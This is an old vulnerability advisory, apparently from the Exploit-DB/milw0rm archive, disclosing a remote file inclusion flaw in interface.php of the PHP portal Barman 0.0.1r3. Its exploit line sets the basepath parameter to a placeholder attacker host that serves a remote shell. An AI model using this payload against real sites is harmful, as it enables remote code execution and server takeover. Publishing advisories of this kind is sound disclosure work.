Barman 0.0.1r3 - 'Interface.php' Remote File Inclusion

EDB-ID:

2920




Platform:

PHP

Date:

2006-12-11


**********************************************************************************************************
                                              DeltasecurityTEAM
                                              WwW.Deltasecurity.iR
**********************************************************************************************************

* Portal Name = Barman 0.0.1r3

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://downloads.sourceforge.net/barman/Barman-0.0.1r3.tgz

* Discoverd By = DeltahackingTEAM

* User In Delta Team = Davood_Cracker

* Conatact = Davood_cracker@yahoo.com

* 128 Bit Security Server= www.takserver.ir

* Just Delta Hacking Security TEAM *
--------------------------------------------------------------------------------------------

- Exploit:


http://localhost/[PATH]/interface.php?basepath=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , Vpc

SP TNX : Dr.Pantagon

**********************************************************************************************************

# milw0rm.com [2006-12-11]